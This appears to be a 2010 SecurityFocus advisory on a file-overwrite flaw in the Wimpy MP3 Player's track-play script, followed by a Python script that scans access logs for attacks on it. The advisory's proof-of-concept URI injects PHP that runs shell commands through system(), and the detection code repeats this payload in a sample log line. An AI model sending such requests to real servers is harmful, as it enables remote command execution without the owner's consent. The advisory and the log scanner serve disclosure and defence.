Wimpy MP3 Player Text File Overwrite Weakness

An exploit is not required.

The following proof of concept URI is available:
http://www.example.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?>
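One way to spot this request pattern in web server access logs, as an added example that is not part of the original advisory. The log lines are constructed, and the combined log format and the list of flagged PHP function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the proof-of-concept URI places PHP code into.
WATCHED_PARAMS = {"trackFile", "trackArtist", "trackTitle"}
# PHP open/close tags, or a call to a code/command-execution function
# (the function list is an assumption; extend it to suit your environment).
SUSPICIOUS = re.compile(
    r"<\?(php|=)?|\?>|\b(system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\(",
    re.IGNORECASE,
)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+) HTTP/[\d.]+"')

# Constructed sample log lines: one ordinary play-count update, one request
# shaped like the proof-of-concept URI above (URL-encoded as a client sends it).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2010:10:00:00 +0000] "GET /pathtowimpy/goodies/'
    'wimpy_trackplays.php?myAction=trackplays&trackFile=song.mp3'
    '&trackArtist=Some+Artist&trackTitle=Some+Title HTTP/1.1" 200 12',
    '198.51.100.9 - - [01/Jan/2010:10:00:05 +0000] "GET /pathtowimpy/goodies/'
    'wimpy_trackplays.php?myAction=trackplays&trackFile=%3C%3Fphp'
    '&trackArtist=system(%22uname%20-a%3Bid%3B%22)%3B&trackTitle=%3F%3E HTTP/1.1" 200 12',
]

def flag_request(log_line):
    """Return {param: decoded value} for watched parameters carrying PHP code."""
    m = REQUEST.search(log_line)
    if not m:
        return {}
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/wimpy_trackplays.php"):
        return {}
    hits = {}
    # parse_qsl percent-decodes values, so encoded and raw payloads both match.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED_PARAMS and SUSPICIOUS.search(value):
            hits[name] = value
    return hits

def scan(lines):
    """Return (line_number, hits) for every log line that trips the check."""
    return [(n, h) for n, h in ((i, flag_request(l)) for i, l in enumerate(lines, 1)) if h]

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_LOG):
        print(f"line {line_no}: PHP code in {sorted(hits)}")
```

A hit means the request tried to write PHP into the track file; whether it succeeded has to be confirmed by inspecting the files the script writes.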


 

Copyright 2010, SecurityFocus